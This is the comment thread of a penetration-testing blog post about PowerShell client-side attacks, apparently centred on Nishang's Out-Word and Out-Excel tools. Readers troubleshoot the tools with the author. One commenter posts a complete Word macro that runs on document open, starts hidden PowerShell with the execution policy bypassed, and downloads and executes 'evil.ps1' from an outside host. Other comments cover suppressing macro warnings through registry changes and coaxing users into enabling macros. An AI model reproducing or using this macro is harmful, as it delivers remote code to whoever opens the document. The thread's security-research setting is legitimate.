tag:blogger.com,1999:blog-8135211063584500909.post871528948534654686..comments2023-10-02T15:18:02.659+05:30Comments on Lab of a Penetration Tester: Using PowerShell for Client Side AttacksNikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.comBlogger31125tag:blogger.com,1999:blog-8135211063584500909.post-497195557652532792015-06-10T14:21:44.593+05:302015-06-10T14:21:44.593+05:30got it .. thanks for your clarification. got it .. thanks for your clarification. Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-49768533584910699382015-06-10T13:31:55.720+05:302015-06-10T13:31:55.720+05:30If you are able to execute Out-Word.ps1 on the tar...If you are able to execute Out-Word.ps1 on the target there would be no warning. Out-Word changes registry settings related to the Trust Center.<br /><br />But if you execute a document generated by Out-Word on a target there would be warnings. Just checked it for Office 2007. Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-43137121276955307992015-06-10T13:06:15.784+05:302015-06-10T13:06:15.784+05:30well i think i figured out the answer, it's ju...well i think i figured out the answer, it's just right here<br /><br />https://enigma0x3.wordpress.com/2014/01/23/maintaining-access-with-normal-dotm/<br /><br />the warning will still show up and we need to have a way to convince the user to do it ... please correct me if i'm wrongAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-67243634070252908012015-06-10T12:44:16.895+05:302015-06-10T12:44:16.895+05:30no i don't, but looks like the Trust Center is...no i don't, but looks like the Trust Center is the one making this alert. <br />i tested on <br />windows server 2008 r2 running office 2010<br />windows 7 running office 2010<br />windows 7 running office 2007<br /><br />https://support.office.com/en-sg/article/Enable-or-disable-macros-in-Office-documents-7b4fdd2e-174f-47e2-9611-9efe4f860b12#bm3Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-16709768892039536902015-06-10T01:09:54.869+05:302015-06-10T01:09:54.869+05:30Interestingly, my test machine was an Office 2007 ...Interestingly, my test machine was an Office 2007 and PowerShellv3. Anyway, godd that you got it working. Warning should not be there. Are you using the -RemainSafe option?Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-24480869680141580012015-06-10T00:23:50.440+05:302015-06-10T00:23:50.440+05:30Well, interestingly it's working now, looks li...Well, interestingly it's working now, looks like upgrading the office resolved the problem, i just have a question on the security warning, per the slides it says that the script automatically disable it via registry keys but it's not he case here as i still able to see the pop up warning message about macro Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-43495969931603191202015-06-09T23:58:51.888+05:302015-06-09T23:58:51.888+05:30i upgraded my office to 2010, it doesn't show ...i upgraded my office to 2010, it doesn't show any error message but i don't see any output, i,e the salary.doc is not getting exported :( any idea how to troubleshoot further ?Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-40834448049577439322015-06-09T19:44:39.081+05:302015-06-09T19:44:39.081+05:30Can you check it on a machine with PowerShell v3? ...Can you check it on a machine with PowerShell v3? I am unable to reproduce the error. Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-13770294831008763142015-06-09T18:58:01.093+05:302015-06-09T18:58:01.093+05:30Hello Nikhil, is your script supposed to work on c...Hello Nikhil, is your script supposed to work on certain windows/office/powershell version ? , i tried the updated release but i got the below error <br /><br />i'm using windows 7<br />office 2007<br /><br />PS C:\Users\hkhrais> $PSVersionTable.PSVersion<br /><br />Major Minor Build Revision<br />----- ----- ----- --------<br />2 0 -1 -1<br /><br /><br /><br />PS C:\Users\hkhrais\Desktop> Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process<br />"<br />Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Microsoft.Office.Interop.Word.WdAlertLevel".<br />Error: "Invalid cast from 'System.Boolean' to 'Microsoft.Office.Interop.Word.WdAlertLevel'.""<br />At C:\Users\hkhrais\Desktop\Out-Word.ps1:105 char:15<br />+ $Word. <<<< DisplayAlerts = $False<br /> + CategoryInfo : InvalidOperation: (:) [], RuntimeException<br /> + FullyQualifiedErrorId : PropertyAssignmentException<br /><br />Argument: '1' should be a System.Management.Automation.PSReference. Use [ref].<br />At C:\Users\hkhrais\Desktop\Out-Word.ps1:192 char:24<br />+ $Doc.Saveas <<<< ($OutputFile, 0)<br /> + CategoryInfo : NotSpecified: (:) [], MethodException<br /> + FullyQualifiedErrorId : NonRefArgumentToRefParameterMsg<br /><br />Saved to file C:\Users\hkhrais\Desktop\Salary_Details.doc<br />0<br /><br /><br />Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-27684377474073080842015-03-05T12:00:51.028+05:302015-03-05T12:00:51.028+05:30Thank you very much for reporting this. It has bee...Thank you very much for reporting this. It has been raised as a bug and fixed. <br />https://github.com/samratashok/nishang/issues/9<br />Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-8112513268346869432015-03-05T03:16:39.206+05:302015-03-05T03:16:39.206+05:30Hey! Awesome work! Love your blog and the awesome ...Hey! Awesome work! Love your blog and the awesome things you are doing in Powershell!<br /><br />Just a quick fix on your code: In your code for "Out-Excel" and "powerpreter", when you create the variable $Payload for the -PayloadURL, you have the syntax in the code as:<br /><br />objProcess.Create '$Payload', Null, objConfig, intProcessID<br /><br />The Single quotes cause the payload to fail, so I change it to double quotes:<br /><br />objProcess.Create "$Payload", Null, objConfig, intProcessID<br /><br />and that worked perfectly! I just wanted to let you know. Keep up the awesome work!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-67353410786005469262015-02-28T22:51:57.324+05:302015-02-28T22:51:57.324+05:30Try anything like Get-Process, $PsVersionTable, Ge...Try anything like Get-Process, $PsVersionTable, Get-Service etc. Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-27065729841906995382015-02-28T21:35:01.282+05:302015-02-28T21:35:01.282+05:30What is simple PS command you mean?
Thank you for ...What is simple PS command you mean?<br />Thank you for atention.Anonymoushttps://www.blogger.com/profile/05434894892078025269noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-10134020992389237322015-02-28T15:39:49.052+05:302015-02-28T15:39:49.052+05:30Your PowerShell script is trying to use Set-Execut...Your PowerShell script is trying to use Set-ExecutionPolicy which needs Elevated privileges. That seems to be the culprit. You don't need that as ExecutionPolicy is already being bypassed. Remove it. Also, try using simple PowerShell commands for testing.Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-52767516401138957182015-02-28T15:29:13.980+05:302015-02-28T15:29:13.980+05:30real macro is:
Sub Document_Open()
Execute...real macro is:<br /> Sub Document_Open()<br /> Execute<br /><br /> End Sub<br /><br /><br /> Public Function Execute() As Variant<br /> Const HIDDEN_WINDOW = 0<br /> strComputer = "."<br /> Set objWMIService = GetObject("WinMgmts:{impersonationLevel=impersonate}!\\.\Root\CIMv2")<br /> <br /> Set objStartup = objWMIService.Get("Win32_ProcessStartup")<br /> Set objConfig = objStartup.SpawnInstance_<br /> objConfig.ShowWindow = HIDDEN_WINDOW<br /> Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")<br /> objProcess.Create "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://beahero.su/evil.ps1'));", Null, objConfig, intProcessID<br /> End Function<br /><br />Can I need special PS script in evil.ps1?<br />I use only one line start ./notepad<br />I did it only for example for me.<br />Thank you.Anonymoushttps://www.blogger.com/profile/05434894892078025269noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-9525851102132388402015-02-28T15:22:22.498+05:302015-02-28T15:22:22.498+05:30Thanks for reporting. Are you using this exact Mac...Thanks for reporting. Are you using this exact Macro? If yes, there is no proper URL being passed to the Macro and this could be the reason. <br /><br />If not, let me try to reproduce this. I didn't test on Windows 8.1. Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-72747265585777016892015-02-28T15:08:28.990+05:302015-02-28T15:08:28.990+05:30Hello.
Thanks for your work.
I have problem with V...Hello.<br />Thanks for your work.<br />I have problem with VBA macro in docx file.<br />I use win 8.1 64 bit, wicrosoft office 2013<br /><br /><br />Public Function Execute() As Variant<br />Const HIDDEN_WINDOW = 0<br />strComputer = "."<br />Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")<br />Set objStartup = objWMIService.Get("Win32_ProcessStartup")<br />Set objConfig = objStartup.SpawnInstance_<br />objConfig.ShowWindow = HIDDEN_WINDOW<br />Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")<br />objProcess.Create "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://evil.ps1'));", Null, objConfig, intProcessID<br />End Function<br /><br />Error in line Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")<br />Run-time error '-2147217406 (80041002)':<br />automation error<br /><br />May be you can help me?Anonymoushttps://www.blogger.com/profile/05434894892078025269noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-11720512582637852642015-02-28T15:03:05.279+05:302015-02-28T15:03:05.279+05:30This comment has been removed by the author.Anonymoushttps://www.blogger.com/profile/05434894892078025269noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-27479463881402386032014-12-09T17:07:39.492+05:302014-12-09T17:07:39.492+05:30Great! it works, thx and congratulations.Great! it works, thx and congratulations.wawanoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-59946577212503883992014-12-09T00:29:21.230+05:302014-12-09T00:29:21.230+05:30Fixed! Thanks a lot!Fixed! Thanks a lot!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-31714624706227631862014-12-08T01:38:16.850+05:302014-12-08T01:38:16.850+05:30Please update your repo and check.Please update your repo and check.Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-42575602978596174912014-12-08T01:36:54.568+05:302014-12-08T01:36:54.568+05:30Please check now. A fix has been pushed.Please check now. A fix has been pushed.Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-55623812131375791012014-12-08T01:36:28.802+05:302014-12-08T01:36:28.802+05:30Hi,
It has been fixed. Please update your reposito...Hi,<br />It has been fixed. Please update your repository. Please respond if it fixes your problem.Nikhil SamratAshok Mittalhttps://www.blogger.com/profile/02092541175521734123noreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-8121816357019963342014-12-07T22:48:21.902+05:302014-12-07T22:48:21.902+05:30Hello,
Thx for your work!
I have tried your fix a...Hello,<br /><br />Thx for your work!<br />I have tried your fix and I have the same issue:<br />-VMware VM win7 Ultimate<br />- Office 2010<br />- PS Version 2 wawanoreply@blogger.comtag:blogger.com,1999:blog-8135211063584500909.post-34183968065194900672014-12-07T18:36:00.972+05:302014-12-07T18:36:00.972+05:30I tried your fix Nikhil but still the same issue ...I tried your fix Nikhil but still the same issue :-(<br /><br />PS: I have MS Office 2010 on win 7.Anonymousnoreply@blogger.com